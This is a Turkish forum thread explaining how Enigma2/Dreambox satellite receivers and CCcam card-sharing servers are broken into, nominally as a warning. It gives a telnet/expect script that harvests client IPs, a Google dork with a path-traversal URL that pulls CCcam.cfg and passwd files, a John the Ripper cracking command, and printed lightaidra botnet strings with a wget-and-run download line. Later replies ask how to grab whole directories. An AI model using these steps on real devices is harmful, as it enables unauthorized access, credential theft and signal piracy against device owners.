Enigma2 (dreambox& türevi) hack

Kapat
X
 
  • Filtre
  • Zaman
  • Gösterim
Clear All
yeni mesajlar
  • tekfar
    Junior Member
    • 12-06-2007
    • 12

    Enigma2 (dreambox& türevi) hack

    konu enigma sistemlerinin nasıl kırıldığı anlatılmış bu sistemlerde düşülen hataların aynısına düşmeyin diye bilgilendirilme amaçlı açılmıştır
    daha değişik yöntemleri bulunup yeri geldiğinde bunlarda paylaşılacaktır


    Teknoloji ürünlerinin satıldığı mağazalarda ürün temsilcileri genellikle cihazların internet özelliklerinden bahsederler.
    Artık cihazların neredeyse olmazsa olmaz özelliklerinin başında internete çıkış yapıp yapmadığı gelir. Gün geçtikçe,
    İnternet nasıl yaygınlaştıysa, satışa sunulan cihazlarında interneti destekleyip desteklemediği ön plana çıkacaktır.
    İster TV olsun, ister sayısal(dijital) uydu alıcısı(receiver) olsun öncelikle müşteriler tarafından sorulan soruların başında
    internet desteği olup olmadığıdır. Sayısal uydu alıcılarının internet desteği olmasının ne faydası vardır? Özellikle şifreli
    TV yayınlarını izlemek isteyen kişilerin hukuksal olmayan yollardan yayınları izlemek için uydu alıcılarında internet çıkışı
    olup olmadığını incelemekteler. Bunun için kişi; şifreli/paralı kanalları izlemek için piyasada bulunan sayısal uydu alıcısı
    (klon ürünleri ucuzdur.) ve CCcam / Kart paylaşım(bu statüye IPTV hızlı bir giriş yapmıştır.) konularının dünyasına merhaba der.
    Anlatmak istediğim bu dünya içerinse de yer alan güvenlik zaafiyetlerine küçük bir giriş yapmak. Sayısal uydu dünyasında
    Dreambox uydu alıcılarının ayrı bir yeri vardır. Neden ayrı bir yeri vardır? Şifreli kanalların izlenmesi için günümüzde kart
    paylaşım işlevleri artmıştır.

    Sayısal uydu dünyasında da bir nevi yasal olmayan işlem sayısı da kart paylaşım oranında artma göstermiştir. Bu tür
    cihazların yazılımları açık kaynak kod olarak sevenleri tarafından geliştirilmektedir. Bu bilgilerin ele geçirilmesi hususunda
    birçok senaryo üretilebilir. Öncelikle, kart paylaşım desteği veren sayısal uydu alıcısının bazı portlarının kontrol edilmesi
    gerekir. Belirttiğim gibi kart paylaşım desteğinin öncülerinden olan Dreambox sayısal uydu alıcısının güvenlik konusuna
    değineceğiz (genelleme yapabilir).

    Kart paylaşım desteği veren(hukuk açısından uygun olmayan bu durum şifreli uydu kanallarını izlemek için başvurulan popüler bir yoldur) bir sunucu için veri iletişimi için önemli portlar vardır. CCCam sunucu için kayda değer iletişim portları(değiştirilmediği sürece) 12000, 16000 ve 16001 nolu kapılardır. 12000 numaralı port, sunucu ile sayısal uydu alıcısı paylaşım işlemi için veri alış verişini gerçekleştir. 16001 numaralı port, “CCcam server web info” olarak adlandırılır. Sunucuya bağlı kart paylaşım desteği alan kullanıcıların bilgileri web üzerinden görülebilir(Kullanıcı adı, şifre desteği, kullanıcı IP adresleri). 16000 numaralı port ise kart paylaşım bilgilerini web üzerinden değil, sunucuya doğrudan bağlantı gerçekleştirip bir dizi komut girilmesiyle bilgiler alınır(telnet sunucu 16000).
    İnternete aktif olarak bağlı sayısal uydu alıcılara yönelik saldırının baş kaynağı 16000 ve 16001 numaraları portların aracılığı ile gerçekleşir.
    Bu saldırı nasıl olmaktadır? Saldırgan faal olarak doğrudan internete bağlı olan ve CCcam desteği alan sayısal uydu alıcılarını tespit etmesi biraz zordur. Saldırganın kullanıcılara ulaşması için yapması gerekenin başında, CCcam sunucularını tespit edip, bu sunucuların portlarını test ederek kart paylaşım desteği alan kullanıcıların ip adreslerini tespit etmektir.

    Sayısal uydu cihazı kullanıcılarının bir kısmı(!) internet aracılığıyla uydu alıcının web arayüzüne(80. port) bağlanarak uydu kanalları izleyebilmektedir. Bu nedenle saldırgan, alıcının web arayüzünün zaafiyetini kullanarak alıcıdan gerekli ayar dosyalarını alıp(CCcam.cfg, IPTV bağlantı dosyası v.b.) kendi isteğince kullanabilir. Hatta dijital uydu alıcısına backdoor(arkakapı) yerleştirerek kontrol altına alabilir. Bu tür saldırılar günümüzde yaşanmış olaylardır. Adım adım Sayısal uydu alıcı kullanıcılarına nasıl yetkisiz erişim sağlandığını görelim. İlk adım belirttiğim gibi CCcam sunucularını tespit ettikten sonra paylaşım alan kullanıcıların IP adreslerini bulmak. Böylece saldırgan, bu IP adresleriyle sayısal uydu alıcılarına bir adım daha yaklaşmak için gerekli ortamı sağlayacaktır.





    Port: 16001 - CCcam Web Info

    Sunucunun 16000 numaralı portuna bağlanıldığında sunucu komut beklemektedir. Bağlantı için “telnet” komutu kullanılabilir(1).





    (1) # telnet ip-adresi 16000


    Bağlantı işleminden sonra sunucu komut bekleme aşamasına geçer. Bu aşamada saldırgan bir dizi komut yardımıyla gerekli bilgileri alır. Komutlar tamamıyla CCcam sunucunun kendi komutlarıdır. Saldırgan komutları bilgi almak için kullandığından dolayı komutların hepsini bütünüyle hakim olsa bile en önemlisi “activeclients” ve “servers” komutlarıdır. “activeclients” komutuyla sisteme bağlı olan sayısal uydu alıcılarının IP adresleri görülmektedir(2).



    (2) “activeclients” komutunun sonucu

    Fakat saldırgan bağlantı için bu işlemleri tek tek yapmaktansa bilgileri elde etmek için bir kod hazırlayıp otomatik olarak işlemleri gerçekleştirir(3).




    (3) Tarama İşlemi

    receiver-komut.exp #!/usr/bin/expect -f

    set timeout 10
    set host [lindex $argv 0]
    set komut [lindex $argv 1]
    if {[llength $argv] != 2} {
    puts stderr "\nCCcam Sunucu Analiz --- <>\n"
    puts stderr "KULLANIMI: $argv0 <IP/HOST> <Komut>\n"
    puts stderr "Komutlar: \n-info\n-activeclients\n-clients\n-servers\n-shares\n-providers\n-entitlements\n"
    exit }

    spawn telnet $host 16000
    expect "Welcome to the CCcam information client."
    send "$komut\r"
    interact
    exit




  • tekfar
    Junior Member
    • 12-06-2007
    • 12

    #2
    Konu: Enigma2 (dreambox&amp; türevi) hack

    Elde edilen bilgiler neticesinde aktif IP adresleri, saldırgan tarafından artık birer hedef haline gelir.
    Bu IP adresleri üzerinde tarama sonucunda elde edilecek bilgilerin başında, port durumları gelmektedir. Önemli olan 21(FTP) / 23(TELNET) ve 80(HTTP). portların durumlarıdır. Sayısal uydu alıcılarında genellikle bu portlar kullanıma açıktır. Uydu alıcısına dosya transferi, yönetim ve web üzerinden uydu kanallarını izlemek için bu portlar kullanımdadır(4). Bu portlar internet üzerinden erişim sağlanacak şekilde ayarlandığında(gerekli ayarlar yapılmazsa) sayısal uydu cihazına istenmeyen bağlantılar sağlanabilir.




    (4) Sayısal uydu alıcısının web arayüzü


    Sayısal uydu alıcının IP adresini tespit edildikten sonra 80. portun durumu incelenir. Port aktif ise saldırgan web arayüzünde zaaflık mevcut olup olmadığını kontrol eder. Zaaflık mevcutsa alıcıdan önemli ayar dosyaları alınır. Böylece kontrol tam olarak sağlanmış olur. Saldırgan için önemli dosyaların başında "passwd(shadow)" ve "CCcam.cfg" yapılandırma dosyaları gelmektedir.


    receiver-test.rb






    (5) Alınan CCcam.cfg dosyası




    (6) Alınan password dosyası




    Ele geçirilen bu dosyalar aracılığıyla saldırgan kendi uydu alıcısını düzenleyerek(özellikle CCcam dosyaları) şifreli uydu kanallarını izler(7).







    aldırgan, ele geçirdiği dosyaların vasıtasıyla bir adım daha ilerleyerek kendini uydu alıcısının sistemine dahil olmak isteyebilir. Bu işlemi gerçekleştirebilmek için alıcıya FTP(21) ya da TELNET(23) ile bağlantı kurması gerekir. Bu portlar erişim durumunda ise web arayüzünde bulunan zaafiyet sonucu ele geçirilen “password” dosyası(6) kırılarak(cracking) bağlantı şifresi elde edilir.
    Ele geçirilen dosyanın kırma işlemi için “john(john the ripper)” kullanılır(alternatifleri de mevcuttur).
    “John The Ripper” GPU destekli(ekran kartı destekleniyorsa) derlenip kırma işlemide GPU yardımıyla gerçekleşirse hızlı bir kırma işlemi olabilir(GPU konusuna girmiyorum).
    Ele geçirilen dosyanın kırma işlemi:

    # john --format=md5crypt-cuda -w:/sozluk/dosya.txt --pot=dream.pot /dreambox/password.txt
    Loaded 1 password hash (md5crypt [CUDA])
    mydream (root) <------- Bingo !!!






    Kullanıcı adına karşılık(baş aktör kullanıcı adı: root) şifre kırıldıktan sonra saldırgan sayısal uydu alıcısına bağlanır(9 / 10).





    Bağlantı aşamasından sonra ilerleyen zamanlarda tekrar uydu alıcısını kontrol etmek isterse sisteme bir arka kapı yerleştirebilme olasılığı mevcuttur(8). Böylece sayısal uydu alıcısının yapılandırma dosyalarında değişiklik olsa da(şifre değişimi v.b.) bağlantı sağlanabilir. Kullanıcı, uydu alıcısının donanım yazılımını güncellerse(firmware update) tüm bilgiler sıfırlanır.




    Yorum

    • tekfar
      Junior Member
      • 12-06-2007
      • 12

      #3
      Konu: Enigma2 (dreambox&amp; türevi) hack





      Son zamanlarda bazı donanımlara solucanlar(worm) bulaşmaya başladı(Botnet oluşturulma amacı güdülmektedir). Bulaşma işlemi donanıma ait yazılımlarının yapılandırılma ve şifre durumundan kaynaklanır. Özellikle Modem/Router gibi cihazlarda basit şifre kullanılması solucanların yayılımını kolaylaştırmıştır. Bunların başında “Psyb0t” gelmiştir(Chuck Norris olarak adlandırılan zararlı yazılımda bu kategoridedir). Şu an çeşitli modem, router, sayısal uydu alıcısı gibi cihazlara entegre olup IRC üzerinden kontrol edilen zararlı yazılım kullanılmaya başlanmıştır. Bu yazılım: “lightaidra” olarak adlandırılmaktadır(14). Gördüğüm kadarıyla birçok cihaza bulaşıp kontrol edilmesine olanak vermiştir. Kontrol işlem IRC ortamında kanallar üzerinden gerçekleşmektedir(12/13). Birçok sistem üzerinde çalıştırılıp kontrol edilme özelliği dikkat çekicidir(11). Kullanıcının tespit edebilmesi için(sayısal uydu alıcısına bulaştıysa) çalışan prosesleri iyi incelemesi gerekmektedir. Bulaştığı sistemde /var/run dizini altına kendisini kopyalar. Dosyalarda değişiklik yapılmadığı takdirde çoğunlukla; mipsel, mips, arm, ppc adlarını alır. Proseslerde bu isimle çalışan uygulamalara dikkat etmek gerekir.


      # strings mipsel-



      PRIVMSG %s :[login] you are logged in, (%s).
      PRIVMSG %s :[!login] sorry, wrong authenthication password!
      5a.bbb.ccc.dd3:8080|5a.bbb.ccc.dd7:8080
      %d.%d.%d.%d
      #mybotnetworld
      NICK %s
      USER pwn localhost localhost :my-world
      TOPIC %s
      %127s%31s%31s%31s%31s%31s%31s%31s
      NICK %s
      :.advscan->recursive
      :.advscan->random->b
      :.advscan->random
      PING
      PRIVMSG
      :.login
      :.logout
      PRIVMSG %s :* *** Access Commands:
      PRIVMSG %s :*
      PRIVMSG %s :* .login <password> - login to bot's party-line
      PRIVMSG %s :* .logout - logout from bot's party-line
      PRIVMSG %s :* *** Miscs Commands
      PRIVMSG %s :* .exec <commands> - execute a system command
      PRIVMSG %s :* .version - show the current version of bot
      PRIVMSG %s :* .status - show the status of bot
      PRIVMSG %s :* .help - show this help message
      PRIVMSG %s :* *** Scan Commands
      PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you
      PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug
      PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random
      PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug

      PRIVMSG %s :* *** DDos Commands:
      PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
      PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
      PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
      PRIVMSG %s :* .spoof <ip> - set the source address ip spoof
      PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
      PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
      PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
      PRIVMSG %s :* *** EOF
      JOIN %s s
      rm -rf /var/run/getbinaries.sh;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget ;wget -c %s/getbinaries.sh -P /var/run && sh /var/run/getbinaries.sh&
      http://danger.<___>.com
      PRIVMSG %s :[nsynflood] packeting completed!
      QUOTE ZOMBIE










      Yukarıda tespit ettiğim “lightaidra” tehlikeli yazılımına ait bir dosyasında yer alan içerik(karakter dizimleri) görünmektedir. Kullanmakta olduğumuz cihazları yöneten, bünyelerinde bulunan yazılımlardır. Kullanıcılar yazılımlarla genellikle muhatap olmazlar, doğrudan satın aldıkları cihazın özelliklerini inceleyerek yorum yapmaktadırlar. Bir cihazı doğrudan internet dünyasına bağladığımızda ve aktif olarak bu cihazı internet üzerinden de kontrol ediyorsak bazı konularda dikkat etmek gerekir. Özellikle şifrelere.

      Yorum

      • tekfar
        Junior Member
        • 12-06-2007
        • 12

        #4
        Konu: Enigma2 (dreambox&amp; türevi) hack

        Dreambox,vu duo,atalanta hd box vs.. bir çok uydu alıcısı bu alt yapıyı kullanarak kart paylaşımı yapıyor.Cihazlardaki açık nedeniyle kart paylaşımı yapılan şifreler ve server şifreleri rahatlıkla ele geçiriliyor.Bununla ilgili açığın kullanımı ve kapatılmasını sizlere göstericem ben kendi evimdeki cihazımda bu şekilde elde ettiğim bir serverı test ettim ve sildim.Eğer cihazlarınızda bu alt yapı varsa mutlaka guncelleme yada kapatma işlemi yapınız.

        Google Arama Kodu : "Enigma2 movielist" filetype:rss


        Açığın kullanımı
        Arama kodunda çıkan sitelerin sonuna file?file=../../../../../../../../../../../../../var/etc/CCcam.cfg bu kodu eklediğiniz takdirde cihazın kullandığı kart paylaşımlı server bilgisine ulaşılıyor.İsterseniz shadow yada passwd dosyalarıda indirilebiliyor.

        Açığı kapatmak için cihazın web arayüzünden güncelleme yapılması gerekmektedir veya Tv kumandası ile yazılım guncellemesi yapılarak bu açıktan kurtulabilirsiniz.

        örnek aramadan çıkan satır şu

        Enigma2 Movielist

        açığın kullanma şekli şu

        Yorum

        • samir77
          Junior Member
          • 12-06-2015
          • 5

          #5
          Re: Konu: Enigma2 (dreambox&amp; türevi) hack

          ve tüm klasörü üzerinde alabilir, ya da var tuxbox Cccam.cfg almak istiyorum nasıl


          /file?file=../../../../../../../../../../../../../var/etc/CCcam. cfg
          Klasörü indirmek için herhangi bir komut var

          Yorum

          • samir77
            Junior Member
            • 12-06-2015
            • 5

            #6
            Re: Konu: Enigma2 (dreambox&amp; türevi) hack

            ve tüm klasörü üzerinde alabilir, ya da var tuxbox Cccam.cfg almak istiyorum nasıl/file?file=../../../../../../../../../../../../../var/etc/CCcam. cfgKlasörü indirmek için herhangi bir komut var

            Yorum

            • xzeplinx
              Junior Member
              • 06-07-2015
              • 1

              #7
              Konu: Enigma2 (dreambox&amp; türevi) hack

              selam arkadaşlar dreambox 500s benim sizlere sormak istediğim bir kaç soru var linüks tabanlı derken pc nin linüksmü olması gerekir windows 7 kullanıyorumda
              2. si bu dreambox 500s yeni yani 2015 yazılımı yokmu şimdiden teşekkür ederim

              Yorum

              • ozkandonmez
                Administrator
                • 30-12-2002
                • 47394

                #8
                Konu: Enigma2 (dreambox&amp; türevi) hack

                Dreambox ın kendisi linux tabanlıdır , sürekli güncel yazılım bulunmaktadır, forumda DREAMBOX bölümünden size uygun kısımda sorularınızı sorabilirsiniz.
                Üyelere Özel Konuları Görebilmek İçin Lütfen ÜYE GİRİŞİ Yapınız



                HAYDI IPTV YAPALIM

                TBS 6991 Dual Tuner Dual CI Tv kartı linux sürücü yükleme

                LÜTFEN OKUYUN

                Yorum

                • samir77
                  Junior Member
                  • 12-06-2015
                  • 5

                  #9
                  Re: Enigma2 (dreambox&amp; türevi) hack

                  Dizin karÅŸıdan yükleme

                  Yorum

                  • samir77
                    Junior Member
                    • 12-06-2015
                    • 5

                    #10
                    Re: Enigma2 (dreambox&amp; türevi) hack

                    Dizin karºıdan yükleme

                    Yorum

                    • samir77
                      Junior Member
                      • 12-06-2015
                      • 5

                      #11
                      Re: Enigma2 (dreambox&amp; türevi) hack

                      how to download Directory

                      Yorum

                      İşlem Yapılıyor
                      X